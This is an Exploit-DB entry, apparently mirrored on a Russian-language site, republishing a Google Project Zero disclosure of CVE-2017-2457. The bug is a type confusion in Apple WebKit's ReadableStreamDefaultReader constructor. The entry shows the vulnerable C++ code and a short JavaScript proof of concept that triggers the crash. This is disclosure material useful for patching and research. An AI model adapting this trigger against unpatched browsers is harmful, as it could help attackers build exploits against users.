- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 41803
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- WEBAPPS
- Платформа
- MULTIPLE
- CVE
- cve-2017-2457
- Дата публикации
- 2017-04-04
Apple WebKit 10.0.2 (12602.3.12.0.1, r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion
HTML:
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1085
EncodedJSValue JSC_HOST_CALL constructJSReadableStreamDefaultReader(ExecState& exec)
{
VM& vm = exec.vm();
auto scope = DECLARE_THROW_SCOPE(vm);
JSReadableStream* stream = jsDynamicDowncast<JSReadableStream*>(exec.argument(0));
if (!stream)
return throwArgumentTypeError(exec, scope, 0, "stream", "ReadableStreamReader", nullptr, "ReadableStream");
JSValue jsFunction = stream->get(&exec, Identifier::fromString(&exec, "getReader")); <<--- 1
CallData callData;
CallType callType = getCallData(jsFunction, callData);
MarkedArgumentBuffer noArguments;
return JSValue::encode(call(&exec, jsFunction, callType, callData, stream, noArguments));
}
It doesn't check whether |getReader| is callable or not.
PoC:
-->
let rs = new ReadableStream();
let cons = rs.getReader().constructor;
rs.getReader = 0x12345;
new cons(rs);
<!--
Tested on Webkit Nightly 10.0.2(12602.3.12.0.1, r210800)
-->- Источник
- www.exploit-db.com
